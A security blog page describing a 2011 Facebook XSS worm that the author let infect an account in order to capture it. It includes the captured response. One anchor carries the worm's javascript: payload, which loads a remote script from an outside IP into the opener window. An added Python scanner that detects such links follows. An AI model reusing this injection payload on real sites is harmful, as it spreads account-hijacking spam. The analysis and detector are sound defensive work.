Kos Security
A blog about security.

Toorcon Seattle 2011, “XSS Without the Browser”

Toorcon Seattle 2011, “XSS Without the Browser” (PDF). Presentation I gave about embedded HTML/JavaScript engines, and the potential security risks when they are not implemented securely. An old Skype bug is used as an example.



Facebook XSS

Some cross-site scripting that was being spread on Facebook. I allowed myself to be compromised (for science!) and opened up a Burp instance beforehand. (Red link is to the actual JavaScript that sent out messages.)

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.144.114.105
X-Cnection: close
Date: Thu, 07 Apr 2011 05:49:39 GMT
Content-Length: 121182

*SNIP*

                                <div>
                                        <div id="app205712022786034_permalink_header_alt" fbcontext="dc593d496581">
                                                <div>
                                                        <a href="http://www.facebook.com/bonaparte" onclick="(new Image()).src = &#039;/ajax/ct.php?app_id=205712022786034&amp;action_type=3&amp;post_form_id=60e2f9386c8e446297b44bb16477472b&amp;position=3&amp;&#039; + Math.random();return true;"><img src="http://i.imgur.com/dPewU.png" /></a>
                                                </div>
                                                <div>
                                                        <h2>Videos Posted by Maria Gonzales</h2>
                                                        <div>
                                                                <div>
                                                                </div>
                                                        </div>
                                                </div>
                                        </div>
                                        <div id="app205712022786034_player" style="border: 0px none #ffffff;" fbcontext="dc593d496581">
                                                <a href=" javascript:if(window.opener)&#123; window.opener.document.body.appendChild(document.createElement(&#039;script&#039;)).src=&#039;[NOT A REAL LINK TO THE ATTACKER]http://173.231.144.82/fb.js?like_link=http://winterweddingfavor.info/bullypal/&amp;app_link=http://fb.me/TzCxMrJW&amp;embed_link=http://www.ebaumsworld.com/playerbeta.swf?id0=81417366&amp;im_text=haha! hilarous&#039;; window.close(); &#125;else&#123; document.body.appendChild(document.createElement(&#039;script&#039;)).src=&#039;[NOT A REAL LINK TO THE ATTACKER]http://173.231.144.82/fb.js?like_link=http://winterweddingfavor.info/bullypal/&amp;app_link=http://fb.me/TzCxMrJW&amp;embed_link=http://www.ebaumsworld.com/playerbeta.swf?id0=81417366&amp;im_text=haha! hilarous&#039;; &#125;" target="_blank" onclick="(new Image()).src = &#039;/ajax/ct.php?app_id=205712022786034&amp;action_type=3&amp;post_form_id=60e2f9386c8e446297b44bb16477472b&amp;position=3&amp;&#039; + Math.random();return true;"><img src="http://i.imgur.com/8hZd5.png" border="0" /></a>
                                        </div>
                                        <div id="app205712022786034_video_info" fbcontext="dc593d496581">
                                                <div id="app205712022786034_video_metadata" fbcontext="dc593d496581">
                                                        <h3>Teacher Pushes Attacking Bully To The Ground</h3>
                                                        <div>
                                                                 by <a href="http://www.facebook.com/bonaparte" onclick="(new Image()).src = &#039;/ajax/ct.php?app_id=205712022786034&amp;action_type=3&amp;post_form_id=60e2f9386c8e446297b44bb16477472b&amp;position=3&amp;&#039; + Math.random();return true;">Maria Gonzales</a> (<a href="/video/?id=" onclick="(new Image()).src = &#039;/ajax/ct.php?app_id=205712022786034&amp;action_type=3&amp;post_form_id=60e2f9386c8e446297b44bb16477472b&amp;position=3&amp;&#039; + Math.random();return true;">videos</a>)
                                                        </div>
                                                        <div>
                                                                <strong>2:30</strong><br /><br />
                                                        </div>
                                                </div>
                                                <div id="app205712022786034_description" fbcontext="dc593d496581">
                                                        <div>
                                                          He should be commended, but sadly, in todays world, he'll probably get in trouble. 
                                                        </div>
                                                </div>
                                                <a role="button" href="/ajax/share_dialog.php?s=&#039;11&amp;appid=2392950137&amp;p[]=487808128343&amp;p[]=&amp;p[]=" title="send this to friends or post it on your profile." onclick="(new Image()).src = &#039;/ajax/ct.php?app_id=205712022786034&amp;action_type=3&amp;post_form_id=60e2f9386c8e446297b44bb16477472b&amp;position=3&amp;&#039; + Math.random();return true;"><span>Share</span></a>
                                                <div id="app205712022786034_video_actions" fbcontext="dc593d496581">
                                                        <ul>
                                                                <li>
                                                                <div>
                                                                        <a href="#" id="app205712022786034_lowqual_toggle" title="watch &quot;bonaparte - menschen live (video) [hd]&quot; in regular quality." onclick="(new Image()).src = &#039;/ajax/ct.php?app_id=205712022786034&amp;action_type=3&amp;post_form_id=60e2f9386c8e446297b44bb16477472b&amp;position=3&amp;&#039; + Math.random();return true;" fbcontext="dc593d496581">
                                                                        View in Regular Quality</a>
                                                                </div>
                                                                <a href="#" id="app205712022786034_highqual_toggle" title="watch &quot;bonaparte - menschen live (video) [hd]&quot; in high quality." onclick="(new Image()).src = &#039;/ajax/ct.php?app_id=205712022786034&amp;action_type=3&amp;post_form_id=60e2f9386c8e446297b44bb16477472b&amp;position=3&amp;&#039; + Math.random();return true;" fbcontext="dc593d496581">View in High Quality</a>
                                                                </li>
                                                                <li><a href="/ajax/report.php?content_type=&#039;13&amp;cid=487808128343&amp;h=AQDMzuGzYxeiGADv" onclick="(new Image()).src = &#039;/ajax/ct.php?app_id=205712022786034&amp;action_type=3&amp;post_form_id=60e2f9386c8e446297b44bb16477472b&amp;position=3&amp;&#039; + Math.random();return true;">Report Video</a></li>
                                                        </ul>
                                                </div>
                                        </div>

*SNIP*
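As an added detection example (my code, not the blog's), a Python scanner for response bodies saved from a proxy that flags anchors like the one captured above: it normalizes each href the way a browser does (entity decoding, leading whitespace, embedded tab/CR/LF) before checking for a javascript: scheme, and records the two hallmarks of this worm, reaching into window.opener and injecting a remotely hosted script element. The sample markup is a constructed cut-down of the capture, with the attacker host replaced by a placeholder.

```python
import re
from html.parser import HTMLParser

# Browsers strip leading/trailing whitespace and C0 controls from a URL and
# ignore tab/CR/LF inside it before reading the scheme, so " javascript:..."
# (leading space, as in the capture above) or "java\tscript:" still executes.
_LEADING = "".join(chr(c) for c in range(0x21))

def normalize_scheme(href):
    """Return the scheme of an entity-decoded href as a browser would see it."""
    url = re.sub(r"[\t\n\r]", "", href.strip(_LEADING))
    m = re.match(r"([A-Za-z][A-Za-z0-9+.-]*):", url)
    return m.group(1).lower() if m else ""

class ScriptHrefFinder(HTMLParser):
    """Collect <a> tags whose href runs script; HTMLParser decodes entities
    (&#039; -> ', &#123; -> {) in attribute values before handing them to us."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "a":
            return
        href = dict(attrs).get("href") or ""
        if normalize_scheme(href) != "javascript":
            return
        self.findings.append({
            "href": href[:60],
            # hallmarks of the worm above: reach into the opener window and
            # inject a remotely hosted <script> element into it
            "uses_opener": "window.opener" in href,
            "loads_remote_script": "createElement('script')" in href,
        })

def find_script_hrefs(markup):
    """Scan an HTML document, e.g. a response body saved from a proxy."""
    parser = ScriptHrefFinder()
    parser.feed(markup)
    parser.close()
    return parser.findings

# Constructed sample cut down from the capture above; attacker host replaced.
SAMPLE = """
<a href="http://www.facebook.com/bonaparte">Maria Gonzales</a>
<a href=" javascript:if(window.opener)&#123; window.opener.document.body.appendChild(document.createElement(&#039;script&#039;)).src=&#039;http://ATTACKER-HOST-PLACEHOLDER/fb.js&#039;; window.close(); &#125;else&#123; document.body.appendChild(document.createElement(&#039;script&#039;)).src=&#039;http://ATTACKER-HOST-PLACEHOLDER/fb.js&#039;; &#125;" target="_blank">play</a>
<a href="/ajax/report.php?content_type=&#039;13&amp;cid=1">Report Video</a>
"""
```

Running `find_script_hrefs(SAMPLE)` returns a single finding for the play link with both hallmarks set; the profile and report links are not flagged.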